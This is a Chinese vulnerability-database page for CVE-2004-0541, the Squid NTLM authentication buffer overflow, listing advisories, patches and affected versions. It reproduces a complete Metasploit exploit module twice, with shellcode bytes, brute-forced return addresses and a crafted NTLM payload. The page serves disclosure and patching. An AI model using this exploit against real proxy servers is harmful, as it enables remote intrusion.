CVE-2004-0541
CVSS10.0
发布时间 :2004-08-06 00:00:00
修订时间 :2010-08-21 00:20:43
NMCOEPS    

[原文]Buffer overflow in the ntlm_check_auth (NTLM authentication) function for Squid Web Proxy Cache 2.5.x and 3.x, when compiled with NTLM handlers enabled, allows remote attackers to execute arbitrary code via a long password ("pass" variable).


[CNNVD]Squid Proxy NTLM验证缓冲区溢出漏洞(CNNVD-200408-098)

        
        Squid是一个高效的Web缓存及代理程序,Squid最初是为Unix平台开发的,现在也被移植到Linux和大多数的Unix类系统中,最新的Squid可以运行在Windows平台下。
        Squid Web proxy在处理NTLM验证时缺少充分边界缓冲区检查,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以进程权限在系统上执行任意指令。
        Squid Web Proxy缓存支持Basic、Digest及NTLM验证,漏洞存在于NTLM验证的帮助函数中,helpers/ntlm_auth/SMB/libntlmssp.c中的ntlm_check_auth()函数:
        char *ntlm_check_auth(ntlm_authenticate * auth, int auth_length){ int rv; char pass[25] /*, encrypted_pass[40] */; char *domain = credentials; ... memcpy(pass, tmp.str, tmp.l); ...
        函数由于对拷贝到'pass'变量的值缺少充分边界检查,过长的密码字段可造成缓冲区溢出及执行任意指令。memcpy()使用的'tmp.str'和'tmp.l'变量包含用户提供的数据。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:national_science_foundation:squid_web_proxy_cache:2.5_stable
cpe:/a:national_science_foundation:squid_web_proxy_cache:3_pre

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:980NTLM Authentication BO in Squid Web Proxy Cache
oval:org.mitre.oval:def:10722Buffer overflow in the ntlm_check_auth (NTLM authentication) function for Squid Web Proxy Cache 2.5.x and 3.x, when compiled with NTLM handl...
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0541
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0541
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200408-098
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/16360
(VENDOR_ADVISORY)  XF  squid-ntlm-bo(16360)
http://www.redhat.com/support/errata/RHSA-2004-242.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2004:242
http://www.idefense.com/application/poi/display?id=107&type=vulnerabilities
(VENDOR_ADVISORY)  MISC  http://www.idefense.com/application/poi/display?id=107&type=vulnerabilities
http://www.gentoo.org/security/en/glsa/glsa-200406-13.xml
(VENDOR_ADVISORY)  GENTOO  GLSA-200406-13
http://www.trustix.net/errata/2004/0033/
(VENDOR_ADVISORY)  TRUSTIX  2004-0033
ftp://patches.sgi.com/support/free/security/advisories/20040604-01-U.asc
(UNKNOWN)  SGI  20040604-01-U
http://www.securityfocus.com/bid/10500
(UNKNOWN)  BID  10500
http://fedoranews.org/updates/FEDORA--.shtml
(UNKNOWN)  FEDORA  FLSA-2006:152809

- 漏洞信息

Squid Proxy NTLM验证缓冲区溢出漏洞
危急 边界条件错误
2004-08-06 00:00:00 2005-10-20 00:00:00
远程  
        
        Squid是一个高效的Web缓存及代理程序,Squid最初是为Unix平台开发的,现在也被移植到Linux和大多数的Unix类系统中,最新的Squid可以运行在Windows平台下。
        Squid Web proxy在处理NTLM验证时缺少充分边界缓冲区检查,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以进程权限在系统上执行任意指令。
        Squid Web Proxy缓存支持Basic、Digest及NTLM验证,漏洞存在于NTLM验证的帮助函数中,helpers/ntlm_auth/SMB/libntlmssp.c中的ntlm_check_auth()函数:
        char *ntlm_check_auth(ntlm_authenticate * auth, int auth_length){ int rv; char pass[25] /*, encrypted_pass[40] */; char *domain = credentials; ... memcpy(pass, tmp.str, tmp.l); ...
        函数由于对拷贝到'pass'变量的值缺少充分边界检查,过长的密码字段可造成缓冲区溢出及执行任意指令。memcpy()使用的'tmp.str'和'tmp.l'变量包含用户提供的数据。
        

- 公告与补丁

        厂商补丁:
        MandrakeSoft
        ------------
        MandrakeSoft已经为此发布了一个安全公告(MDKSA-2004:059)以及相应补丁:
        MDKSA-2004:059:Updated squid packages fix remotely exploitable vulnerability
        链接:
        http://www.linux-mandrake.com/en/security/2004/2004-059.php

        补丁下载:
        Updated Packages:
        Mandrakelinux 10.0:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/10.0/RPMS/squid-2.5.STABLE4-1.2.100mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/10.0/SRPMS/squid-2.5.STABLE4-1.2.100mdk.src.rpm
        Mandrakelinux 10.0/AMD64:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/amd64/10.0/RPMS/squid-2.5.STABLE4-1.2.100mdk.amd64.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/amd64/10.0/SRPMS/squid-2.5.STABLE4-1.2.100mdk.src.rpm
        Mandrakelinux 9.1:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/9.1/RPMS/squid-2.5.STABLE1-7.2.91mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/9.1/SRPMS/squid-2.5.STABLE1-7.2.91mdk.src.rpm
        Mandrakelinux 9.1/PPC:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/9.1/RPMS/squid-2.5.STABLE1-7.2.91mdk.ppc.rpm
        上述升级软件还可以在下列地址中的任意一个镜像ftp服务器上下载:
        
        http://www.mandrakesecure.net/en/ftp.php

        S.u.S.E.
        --------
        S.u.S.E.已经为此发布了一个安全公告(SuSE-SA:2004:016)以及相应补丁:
        SuSE-SA:2004:016:squid
        链接:
        补丁下载:
        SuSE Patch squid-2.4.STABLE6-9.i386.patch.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/8.0/n2/squid-2.4.STABLE6-9.i386.patch.rpm
        Intel i386 Platform
        SuSE Upgrade squid-2.5.STABLE5-42.9.i586.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/squid-2.5.STABLE5-42.9.i586.rpm
        Intel i386 Platform
        SuSE Patch squid-2.5.STABLE5-42.9.i586.patch.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/squid-2.5.STABLE5-42.9.i586.patch.rpm
        Intel i386 Platform
        SuSE Upgrade squid-2.5.STABLE5-42.9.x86_64.rpm
        ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/squid-2.5.STABLE5-42.9.x86_64.rpm
        Opteron x86_64 Platform
        SuSE Patch squid-2.5.STABLE5-42.9.x86_64.patch.rpm
        ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/squid-2.5.STABLE5-42.9.x86_64.patch.rpm
        Opteron x86_64 Platform
        SuSE Upgrade squid-2.5.STABLE3-110.i586.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/squid-2.5.STABLE3-110.i586.rpm
        Intel i386 Platform
        SuSE Patch squid-2.5.STABLE3-110.i586.patch.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/squid-2.5.STABLE3-110.i586.patch.rpm
        Intel i386 Platform
        SuSE Upgrade squid-2.5.STABLE3-110.x86_64.rpm
        ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/squid-2.5.STABLE3-110.x86_64.rpm
        Opteron x86_64 Platform
        SuSE Patch squid-2.5.STABLE3-110.x86_64.patch.rpm
        ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/squid-2.5.STABLE3-110.x86_64.patch.rpm
        Opteron x86_64 Platform
        Squid Web Proxy Cache 2.5 STABLE1:
        Squid Patch libntlmssp.c.patch
        
        http://www.squid-cache.org/~wessels/patch/libntlmssp.c.patch

        SuSE Upgrade squid-2.5.STABLE1-98.i586.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/squid-2.5.STABLE1-98.i586.rpm
        Intel i386 Platform
        SuSE Patch squid-2.5.STABLE1-98.i586.patch.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/squid-2.5.STABLE1-98.i586.patch.rpm
        Intel i386 Platform
        Squid
        -----
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        Squid Patch libntlmssp.c.patch
        
        http://www.squid-cache.org/~wessels/patch/libntlmssp.c.patch

- 漏洞信息 (16847)

Squid NTLM Authenticate Overflow (EDBID:16847)
linux remote
2010-04-30 Verified
0 metasploit
N/A [点击下载]
##
# $Id: squid_ntlm_authenticate.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Brute
	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Squid NTLM Authenticate Overflow',
			'Description'    => %q{
					This is an exploit for Squid\'s NTLM authenticate overflow
				(libntlmssp.c). Due to improper bounds checking in
				ntlm_check_auth, it is possible to overflow the 'pass'
				variable on the stack with user controlled data of a user
				defined length.  Props to iDEFENSE for the advisory.
			},
			'Author'         => 'skape',
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					[ 'CVE', '2004-0541'],
					[ 'OSVDB', '6791'],
					[ 'URL', 'http://www.idefense.com/application/poi/display?id=107'],
					[ 'BID', '10500'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 256,
					'MinNops'  => 16,
					'Prepend'  => "\x31\xc9\xf7\xe1\x8d\x58\x0e\xb0\x30\x41\xcd\x80",
					'PrependEncoder' => "\x83\xec\x7f",

				},
			'Targets'        =>
				[
					[ 'Linux Bruteforce',
						{
							'Platform'   => 'linux',
							'Bruteforce' =>
								{
									'Start' => { 'Ret' => 0xbfffcfbc, 'Valid' => 0xbfffcf9c },
									'Stop'  => { 'Ret' => 0xbffffffc, 'Valid' => 0xbffffffc },
									'Step'  => 0
								}
						},
					],
				],
			'DisclosureDate' => 'Jun 8 2004',
			'DefaultTarget'  => 0))

		register_advanced_options(
			[
				# We must wait 15 seconds between each attempt so as to prevent
				# squid from exiting completely after 5 crashes.
				OptInt.new('BruteWait', [ false, "Delay between brute force attempts", 15 ]),
			], self.class)
	end

	def brute_exploit(addresses)
		site = "http://" + rand_text_alpha(rand(128)) + ".com"

		print_status("Trying 0x#{"%.8x" % addresses['Ret']}...")
		connect

		trasnmit_negotiate(site)
		transmit_authenticate(site, addresses)

		handler
		disconnect
	end

	def trasnmit_negotiate(site)
		negotiate  =
			"NTLMSSP\x00"        + # NTLMSSP identifier
			"\x01\x00\x00\x00"   + # NTLMSSP_NEGOTIATE
			"\x07\x00\xb2\x07"   + # flags
			"\x01\x00\x09\x00"   + # workgroup len/max       (1)
			"\x01\x00\x00\x00"   + # workgroup offset        (1)
			"\x01\x00\x03\x00"   + # workstation len/max     (1)
			"\x01\x00\x00\x00"     # workstation offset      (1)

		print_status("Sending NTLMSSP_NEGOTIATE (#{negotiate.length} bytes)")
		req =
			"GET #{site} HTTP/1.1\r\n" +
			"Proxy-Connection: Keep-Alive\r\n" +
			"Proxy-Authorization: NTLM #{Rex::Text.encode_base64(negotiate)}\r\n" +
			"\r\n"
		sock.put(req)

	end

	def transmit_authenticate(site, addresses)
		overflow     =
			rand_text_alphanumeric(0x20) +
			[addresses['Ret']].pack('V') +
			[addresses['Valid']].pack('V') +
			"\xff\x00\x00\x00"
		shellcode    = payload.encoded
		pass_len     = [overflow.length + shellcode.length].pack('v')
		authenticate =
			"NTLMSSP\x00"        + # NTLMSSP identifier
			"\x03\x00\x00\x00"   + # NTLMSSP_AUTHENTICATE
			pass_len + pass_len  + # lanman response len/max
			"\x38\x00\x00\x00"   + # lanman response offset  (56)
			"\x01\x00\x01\x00"   + # nt response len/max     (1)
			"\x01\x00\x00\x00"   + # nt response offset      (1)
			"\x01\x00\x01\x00"   + # domain name len/max     (1)
			"\x01\x00\x00\x00"   + # domain name offset      (1)
			"\x01\x00\x01\x00"   + # user name               (1)
			"\x01\x00\x00\x00"   + # user name offset        (1)
			"\x00\x00\x00\x00"   + # session key
			"\x8b\x00\x00\x00"   + # session key
			"\x06\x82\x00\x02"   + # flags
			overflow + shellcode

		print_status("Sending NTLMSSP_AUTHENTICATE (#{authenticate.length} bytes)")
		req =
			"GET #{site} HTTP/1.1\r\n" +
			"Proxy-Connection: Keep-Alive\r\n" +
			"Proxy-Authorization: NTLM #{Rex::Text.encode_base64(authenticate)}\r\n" +
			"\r\n"
		sock.put(req)
	end

end
		

- 漏洞信息 (F82249)

Squid NTLM Authenticate Overflow (PacketStormID:F82249)
2009-10-27 00:00:00
skape  
exploit,overflow
CVE-2004-0541
[点击下载]

This is an exploit for Squid's NTLM authenticate overflow (libntlmssp.c). Due to improper bounds checking in ntlm_check_auth, it is possible to overflow the 'pass' variable on the stack with user controlled data of a user defined length.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Brute
	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Squid NTLM Authenticate Overflow',
			'Description'    => %q{
				This is an exploit for Squid's NTLM authenticate overflow
				(libntlmssp.c). Due to improper bounds checking in
				ntlm_check_auth, it is possible to overflow the 'pass'
				variable on the stack with user controlled data of a user
				defined length.  Props to iDEFENSE for the advisory.
			},
			'Author'         => 'skape',
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2004-0541'],
					[ 'OSVDB', '6791'],
					[ 'URL', 'http://www.idefense.com/application/poi/display?id=107'],
					[ 'BID', '10500'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 256,
					'MinNops'  => 16,
					'Prepend'  => "\x31\xc9\xf7\xe1\x8d\x58\x0e\xb0\x30\x41\xcd\x80",
					'PrependEncoder' => "\x83\xec\x7f",

				},
			'Targets'        => 
				[
					[ 'Linux Bruteforce', 
						{ 
							'Platform'   => 'linux', 
							'Bruteforce' => 
								{
									'Start' => { 'Ret' => 0xbfffcfbc, 'Valid' => 0xbfffcf9c },
									'Stop'  => { 'Ret' => 0xbffffffc, 'Valid' => 0xbffffffc },
									'Step'  => 0
								}
						}, 
					],
				],
			'DisclosureDate' => 'Jun 8 2004',
			'DefaultTarget'  => 0))

		register_advanced_options(
			[
				# We must wait 15 seconds between each attempt so as to prevent
				# squid from exiting completely after 5 crashes.
				OptInt.new('BruteWait', [ false, "Delay between brute force attempts", 15 ]),
			], self.class)
	end

	def brute_exploit(addresses)
		site = "http://" + rand_text_alpha(rand(128)) + ".com"

		print_status("Trying 0x#{"%.8x" % addresses['Ret']}...")
		connect

		trasnmit_negotiate(site)
		transmit_authenticate(site, addresses)

		handler
		disconnect
	end

	def trasnmit_negotiate(site)
		negotiate  = 
			"NTLMSSP\x00"        + # NTLMSSP identifier
			"\x01\x00\x00\x00"   + # NTLMSSP_NEGOTIATE
			"\x07\x00\xb2\x07"   + # flags
			"\x01\x00\x09\x00"   + # workgroup len/max       (1)
			"\x01\x00\x00\x00"   + # workgroup offset        (1)
			"\x01\x00\x03\x00"   + # workstation len/max     (1)
			"\x01\x00\x00\x00"     # workstation offset      (1)

		print_status("Sending NTLMSSP_NEGOTIATE (#{negotiate.length} bytes)")
		req =
			"GET #{site} HTTP/1.1\r\n" +
			"Proxy-Connection: Keep-Alive\r\n" +
			"Proxy-Authorization: NTLM #{Rex::Text.encode_base64(negotiate)}\r\n" +
			"\r\n"
		sock.put(req)
		
	end

	def transmit_authenticate(site, addresses)
		overflow     = 
			rand_text_alphanumeric(0x20) + 
			[addresses['Ret']].pack('V') + 
			[addresses['Valid']].pack('V') + 
			"\xff\x00\x00\x00"
		shellcode    = payload.encoded
		pass_len     = [overflow.length + shellcode.length].pack('v')
		authenticate =
			"NTLMSSP\x00"        + # NTLMSSP identifier
			"\x03\x00\x00\x00"   + # NTLMSSP_AUTHENTICATE
			pass_len + pass_len  + # lanman response len/max
			"\x38\x00\x00\x00"   + # lanman response offset  (56)
			"\x01\x00\x01\x00"   + # nt response len/max     (1)
			"\x01\x00\x00\x00"   + # nt response offset      (1)
			"\x01\x00\x01\x00"   + # domain name len/max     (1)
			"\x01\x00\x00\x00"   + # domain name offset      (1)
			"\x01\x00\x01\x00"   + # user name               (1)
			"\x01\x00\x00\x00"   + # user name offset        (1)
			"\x00\x00\x00\x00"   + # session key
			"\x8b\x00\x00\x00"   + # session key
			"\x06\x82\x00\x02"   + # flags
			overflow + shellcode

		print_status("Sending NTLMSSP_AUTHENTICATE (#{authenticate.length} bytes)")
		req =
			"GET #{site} HTTP/1.1\r\n" +
			"Proxy-Connection: Keep-Alive\r\n" +
			"Proxy-Authorization: NTLM #{Rex::Text.encode_base64(authenticate)}\r\n" +
			"\r\n"
		sock.put(req)
	end

end

    

- 漏洞信息 (F33527)

iDEFENSE Security Advisory 2004-06-08.t (PacketStormID:F33527)
2004-06-10 00:00:00
iDefense Labs  idefense.com
advisory,remote,overflow,arbitrary
CVE-2004-0541
[点击下载]

iDEFENSE Security Advisory 06.08.04: A remote attacker can compromise a target system if Squid Proxy is configured to use the NTLM authentication helper. The attacker can send an overly long password to overflow the buffer and execute arbitrary code.

Squid Web Proxy Cache NTLM Authentication Helper Buffer Overflow Vulnerability

iDEFENSE Security Advisory 06.08.04:

*I. BACKGROUND*

Squid is a fully-featured Web Proxy Cache designed to run on Unix
systems and supports proxying and caching of HTTP, FTP, and other URLs,
as well as SSL support, cache hierarchies, transparent caching, access
control lists and many other features. More information is available at
http://www.squid-cache.org.

*II. DESCRIPTION*

Remote exploitation of a buffer overflow vulnerability in Squid Web
Proxy Cache could allow a remote attacker to execute arbitrary code.
Squid Web Proxy Cache supports Basic, Digest and NTLM authentication.
The vulnerability specifically exists within the NTLM authentication
helper routine, ntlm_check_auth(), located in
helpers/ntlm_auth/SMB/libntlmssp.c:

char *ntlm_check_auth(ntlm_authenticate * auth, int auth_length)
{
    int rv;
    char pass[25] /*, encrypted_pass[40] */;
    char *domain = credentials;
    ...
    memcpy(pass, tmp.str, tmp.l);
    ...

The function contains a buffer overflow vulnerability due to a lack of
bounds checking on the values copied to the 'pass' variable. Both the
'tmp.str' and 'tmp.l' variables used in the memcpy() call contain
user-supplied data.

*III. ANALYSIS*

A remote attacker can compromise a target system if Squid Proxy is
configured to use the NTLM authentication helper. The attacker can send
an overly long password to overflow the buffer and execute arbitrary
code.

*IV. DETECTION*

iDEFENSE has confirmed the existence of this vulnerability in
Squid-Proxy 2.5.*-STABLE and 3.*-PRE when Squid-Proxy is compiled with
the NTLM helper enabled.

*V. WORKAROUNDS*

Recompile Squid-Proxy with NTLM handlers disabled.

*VI. VENDOR RESPONSE*

A patch for this issue is available at:

http://www.squid-cache.org/~wessels/patch/libntlmssp.c.patch

*VII. CVE INFORMATION*

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2004-0541 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which
standardizes names for
security problems.

*VIII. DISCLOSURE TIMELINE*

04/27/04  Exploit acquired by iDEFENSE
05/19/04  iDEFENSE Clients notified
05/20/04  Initial vendor notification
05/20/04  Initial vendor response
06/07/04  Public Disclosure

*IX. CREDIT*

The discoverer wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

*X. LEGAL NOTICES*

Copyright     

- 漏洞信息

6791
Squid ntlm_check_auth Function NTLM Authentication Helper Password Handling Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Workaround, Patch / RCS
Exploit Public Vendor Verified

- 漏洞描述

A remote overflow exists in the Squid Internet Object Cache server. Squid fails to correctly test the length of the user-supplied LanMan Hash value in the ntlm_check_auth() function resulting in a stack-based buffer overflow. With a specially crafted request, an attacker can execute arbitrary code on the system with the privileges the Squid process is running under. This flaw can only be exploited if Squid was compiled with the NTLM authentication helper enabled.

- 时间线

2004-06-08 2004-06-09
2004-06-09 Unknow

- 解决方案

A patch has been released for this vulnerability available from the Squid website. Additionally, Squid can be recompiled to disable NTLM authentication.

- 相关参考

- 漏洞作者

- 漏洞信息

Squid Proxy NTLM Authentication Buffer Overflow Vulnerability
Boundary Condition Error 10500
Yes No
2004-06-09 12:00:00 2007-11-15 12:40:00
The discoverer of this issue wishes to remain anonymous.

- 受影响的程序版本

Squid Web Proxy Cache 2.5 .STABLE5
+ Conectiva Linux 10.0
+ Conectiva Linux 9.0
+ S.u.S.E. Linux Personal 9.1 x86_64
+ S.u.S.E. Linux Personal 9.1
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
Squid Web Proxy Cache 2.5 .STABLE4
+ MandrakeSoft Corporate Server 3.0
+ Mandriva Linux Mandrake 10.0 AMD64
+ Mandriva Linux Mandrake 10.0
+ OpenPKG OpenPKG 2.0
+ OpenPKG OpenPKG Current
Squid Web Proxy Cache 2.5 .STABLE3
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
+ OpenPKG OpenPKG 1.3
+ Red Hat Enterprise Linux AS 3
+ Red Hat Fedora Core1
+ RedHat Desktop 3.0
+ RedHat Enterprise Linux ES 3
+ RedHat Enterprise Linux WS 3
+ S.u.S.E. Linux Personal 9.0 x86_64
+ S.u.S.E. Linux Personal 9.0
Squid Web Proxy Cache 2.5 .STABLE1
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ S.u.S.E. Linux Personal 8.2
Squid Web Proxy Cache 2.4 .STABLE7
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Multi Network Firewall 2.0
+ Red Hat Enterprise Linux AS 2.1 IA64
+ Red Hat Enterprise Linux AS 2.1
+ RedHat Enterprise Linux ES 2.1 IA64
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux WS 2.1 IA64
+ RedHat Enterprise Linux WS 2.1
+ RedHat Linux Advanced Work Station 2.1
Squid Web Proxy Cache 2.4
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
Squid Web Proxy Cache 2.3 .STABLE5
Squid Web Proxy Cache 2.1 PATCH2
Squid Web Proxy Cache 2.0 PATCH2
SGI ProPack 3.0
RedHat Linux 9.0 i386
RedHat Linux 8.0 i686
RedHat Linux 8.0 i386
RedHat Linux 8.0
RedHat Linux 7.3 i386
Red Hat Fedora Core2
Red Hat Fedora Core1
Mandriva Linux Mandrake 7.2
Debian Linux 3.0 sparc
Debian Linux 3.0 s/390
Debian Linux 3.0 ppc
Debian Linux 3.0 mipsel
Debian Linux 3.0 mips
Debian Linux 3.0 m68k
Debian Linux 3.0 ia-64
Debian Linux 3.0 ia-32
Debian Linux 3.0 hppa
Debian Linux 3.0 arm
Debian Linux 3.0 alpha
Debian Linux 3.0

- 漏洞讨论

Squid Web Proxy Cache is reportedly affected by a buffer-overflow vulnerability when processing NTLM authentication credentials. The application fails to properly validate buffer boundaries when copying user-supplied input.

This would allow an attacker to modify stack-based process memory to cause a denial-of-service condition and execute arbitrary code in the context of the vulnerable web proxy. This will most likely facilitate unauthorized access to the affected computer.

- 漏洞利用

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

An exploit is available for the Metasploit Framework:

- 解决方案

Please see the referenced advisories for more information and fixes.


Squid Web Proxy Cache 2.4

Squid Web Proxy Cache 2.5 .STABLE4

Squid Web Proxy Cache 2.5 .STABLE1

Squid Web Proxy Cache 2.5 .STABLE3

Squid Web Proxy Cache 2.5 .STABLE5

SGI ProPack 3.0

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站